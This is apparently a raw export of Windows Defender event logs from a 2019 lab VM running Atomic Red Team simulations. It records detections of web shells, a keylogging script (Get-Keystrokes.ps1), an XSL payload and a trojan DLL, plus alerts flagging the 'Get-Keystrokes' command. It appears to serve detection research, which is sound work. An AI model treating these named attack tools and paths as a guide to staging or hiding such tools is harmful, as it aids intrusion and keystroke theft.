C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl 1 %%845 1 %%813 2 %%823 0 6 %%811 0x80508023 The program could not find the malware and other potentially unwanted software on this device. 0 0 No additional actions required NT AUTHORITY\SYSTEM AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 AM: 1.1.16100.4, NIS: 0.0.0.0 ",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational Windows Defender took action against Malware,1563483211.952568,2019-07-19T00:53:31.952568+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( High ) , Name ( HackTool:JS/Jsprat ) , Action ( 2 ) , Catgeory ( Tool ) , Path ( containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117," 1117 0 4 0 0 0x8000000000000000 105 Microsoft-Windows-Windows Defender/Operational MSEDGEWIN10 %%827 4.18.1906.3 {37522D93-EBDD-4A5B-93B6-E984C9E3FD38} 2019-07-18T20:40:16.697Z 2147708292 HackTool:JS/Jsprat 4 High 34 Tool https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0 3 2 3 %%818 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) 1 %%845 1 %%813 8 %%862 0 2 %%809 0x00000000 The operation completed successfully. 0 0 No additional actions required NT AUTHORITY\SYSTEM AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 AM: 1.1.16100.4, NIS: 0.0.0.0 ",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational Windows Defender took action against Malware,1563483211.905406,2019-07-19T00:53:31.905406+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Trojan:Win32/Sehyioa.A!cl ) , Action ( 2 ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117," 1117 0 4 0 0 0x8000000000000000 104 Microsoft-Windows-Windows Defender/Operational MSEDGEWIN10 %%827 4.18.1906.3 {F6272F78-9FD1-47D2-B206-89E0F0DCBDB9} 2019-07-18T20:41:40.357Z 2147726426 Trojan:Win32/Sehyioa.A!cl 5 Severe 8 Trojan https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Sehyioa.A!cl&threatid=2147726426&enterprise=0 3 2 3 %%818 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll 1 %%845 1 %%813 8 %%862 0 2 %%809 0x00000000 The operation completed successfully. 0 0 No additional actions required NT AUTHORITY\SYSTEM AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 AM: 1.1.16100.4, NIS: 0.0.0.0 ",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational Windows Defender took action against Malware,1563483211.90261,2019-07-19T00:53:31.902610+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Backdoor:ASP/Ace.T ) , Action ( 2 ) , Catgeory ( Backdoor ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117," 1117 0 4 0 0 0x8000000000000000 103 Microsoft-Windows-Windows Defender/Operational MSEDGEWIN10 %%827 4.18.1906.3 {CEF4D8DA-15D6-4667-8E4C-12D19AB4EFED} 2019-07-18T20:40:18.385Z 2147683177 Backdoor:ASP/Ace.T 5 Severe 6 Backdoor https://go.microsoft.com/fwlink/?linkid=37020&name=Backdoor:ASP/Ace.T&threatid=2147683177&enterprise=0 3 2 3 %%818 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx 1 %%845 1 %%813 0 %%822 0 2 %%809 0x00000000 The operation completed successfully. 0 0 No additional actions required NT AUTHORITY\SYSTEM AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 AM: 1.1.16100.4, NIS: 0.0.0.0 ",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational Windows Defender Found Malware,1563483211.900809,2019-07-19T00:53:31.900809+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( High ) , Name ( HackTool:JS/Jsprat ) , Catgeory ( Tool ) , Path ( containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116," 1116 0 3 0 0 0x8000000000000000 102 Microsoft-Windows-Windows Defender/Operational MSEDGEWIN10 %%827 4.18.1906.3 {37522D93-EBDD-4A5B-93B6-E984C9E3FD38} 2019-07-18T20:40:16.697Z 2147708292 HackTool:JS/Jsprat 4 High 34 Tool https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0 1 1 3 %%818 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) 1 %%845 1 %%813 8 %%862 0 9 %%887 0x00000000 The operation completed successfully. 0 0 No additional actions required AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 AM: 1.1.16100.4, NIS: 0.0.0.0 ",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational Suspicious Command or process found in the log,1563483110.798994,2019-07-19T00:51:50.798994+04:00,,Threat,Critical,Found a log contain suspicious powershell command ( Get-Keystrokes),1117," 1117 0 4 0 0 0x8000000000000000 101 Microsoft-Windows-Windows Defender/Operational MSEDGEWIN10 %%827 4.18.1906.3 {511224D4-1EB4-47B9-BC4A-37E21F923FED} 2019-07-18T20:40:00.580Z 2147725349 Trojan:PowerShell/Powersploit.M 5 Severe 8 Trojan https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0 103 2 3 %%818 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 1 %%845 1 %%813 0 %%822 0 2 %%809 0x80508023 The program could not find the malware and other potentially unwanted software on this device. 0 0 No additional actions required NT AUTHORITY\SYSTEM AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 AM: 1.1.16100.4, NIS: 0.0.0.0 ",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational Windows Defender took action against Malware,1563483110.798994,2019-07-19T00:51:50.798994+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Trojan:PowerShell/Powersploit.M ) , Action ( 2 ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117," 1117 0 4 0 0 0x8000000000000000 101 Microsoft-Windows-Windows Defender/Operational MSEDGEWIN10 %%827 4.18.1906.3 {511224D4-1EB4-47B9-BC4A-37E21F923FED} 2019-07-18T20:40:00.580Z 2147725349 Trojan:PowerShell/Powersploit.M 5 Severe 8 Trojan https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0 103 2 3 %%818 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 1 %%845 1 %%813 0 %%822 0 2 %%809 0x80508023 The program could not find the malware and other potentially unwanted software on this device. 0 0 No additional actions required NT AUTHORITY\SYSTEM AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 AM: 1.1.16100.4, NIS: 0.0.0.0 ",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational Windows Defender Found Malware,1563482515.198914,2019-07-19T00:41:55.198914+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Trojan:Win32/Sehyioa.A!cl ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116," 1116 0 3 0 0 0x8000000000000000 95 Microsoft-Windows-Windows Defender/Operational MSEDGEWIN10 %%827 4.18.1906.3 {F6272F78-9FD1-47D2-B206-89E0F0DCBDB9} 2019-07-18T20:41:40.357Z 2147726426 Trojan:Win32/Sehyioa.A!cl 5 Severe 8 Trojan https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Sehyioa.A!cl&threatid=2147726426&enterprise=0 1 1 3 %%818 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll 1 %%845 1 %%813 8 %%862 0 9 %%887 0x00000000 The operation completed successfully. 0 0 No additional actions required AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 AM: 1.1.16100.4, NIS: 0.0.0.0 ",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational Windows Defender Found Malware,1563482477.632054,2019-07-19T00:41:17.632054+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Backdoor:ASP/Ace.T ) , Catgeory ( Backdoor ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116," 1116 0 3 0 0 0x8000000000000000 76 Microsoft-Windows-Windows Defender/Operational MSEDGEWIN10 %%827 4.18.1906.3 {CEF4D8DA-15D6-4667-8E4C-12D19AB4EFED} 2019-07-18T20:40:18.385Z 2147683177 Backdoor:ASP/Ace.T 5 Severe 6 Backdoor https://go.microsoft.com/fwlink/?linkid=37020&name=Backdoor:ASP/Ace.T&threatid=2147683177&enterprise=0 1 1 3 %%818 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx 1 %%845 1 %%813 0 %%822 0 9 %%887 0x00000000 The operation completed successfully. 0 0 No additional actions required AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0 AM: 1.1.16100.4, NIS: 1.1.16100.4 ",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational Windows Defender Found Malware,1563482477.508276,2019-07-19T00:41:17.508276+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( High ) , Name ( HackTool:JS/Jsprat ) , Catgeory ( Tool ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116," 1116 0 3 0 0 0x8000000000000000 75 Microsoft-Windows-Windows Defender/Operational MSEDGEWIN10 %%827 4.18.1906.3 {37522D93-EBDD-4A5B-93B6-E984C9E3FD38} 2019-07-18T20:40:16.697Z 2147708292 HackTool:JS/Jsprat 4 High 34 Tool https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0 1 1 3 %%818 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) 1 %%845 1 %%813 8 %%862 0 9 %%887 0x00000000 The operation completed successfully. 0 0 No additional actions required AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0 AM: 1.1.16100.4, NIS: 1.1.16100.4 ",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational Windows Defender Found Malware,1563482475.439635,2019-07-19T00:41:15.439635+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Trojan:XML/Exeselrun.gen!A ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116," 1116 0 3 0 0 0x8000000000000000 48 Microsoft-Windows-Windows Defender/Operational MSEDGEWIN10 %%827 4.18.1906.3 {8791B1FB-0FE7-412E-B084-524CB5A221F3} 2019-07-18T20:40:13.775Z 2147735426 Trojan:XML/Exeselrun.gen!A 5 Severe 8 Trojan https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:XML/Exeselrun.gen!A&threatid=2147735426&enterprise=0 1 1 3 %%818 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl 1 %%845 1 %%813 2 %%823 0 9 %%887 0x00000000 The operation completed successfully. 0 0 No additional actions required AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0 AM: 1.1.16100.4, NIS: 1.1.16100.4 ",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational Suspicious Command or process found in the log,1563482402.281388,2019-07-19T00:40:02.281388+04:00,,Threat,Critical,Found a log contain suspicious powershell command ( Get-Keystrokes),1116," 1116 0 3 0 0 0x8000000000000000 37 Microsoft-Windows-Windows Defender/Operational MSEDGEWIN10 %%827 4.18.1906.3 {511224D4-1EB4-47B9-BC4A-37E21F923FED} 2019-07-18T20:40:00.580Z 2147725349 Trojan:PowerShell/Powersploit.M 5 Severe 8 Trojan https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0 1 1 3 %%818 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 1 %%845 1 %%813 0 %%822 0 9 %%887 0x00000000 The operation completed successfully. 0 0 No additional actions required AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0 AM: 1.1.16100.4, NIS: 1.1.16100.4 ",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational Windows Defender Found Malware,1563482402.281388,2019-07-19T00:40:02.281388+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Trojan:PowerShell/Powersploit.M ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116," 1116 0 3 0 0 0x8000000000000000 37 Microsoft-Windows-Windows Defender/Operational MSEDGEWIN10 %%827 4.18.1906.3 {511224D4-1EB4-47B9-BC4A-37E21F923FED} 2019-07-18T20:40:00.580Z 2147725349 Trojan:PowerShell/Powersploit.M 5 Severe 8 Trojan https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0 1 1 3 %%818 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 1 %%845 1 %%813 0 %%822 0 9 %%887 0x00000000 The operation completed successfully. 0 0 No additional actions required AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0 AM: 1.1.16100.4, NIS: 1.1.16100.4 ",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational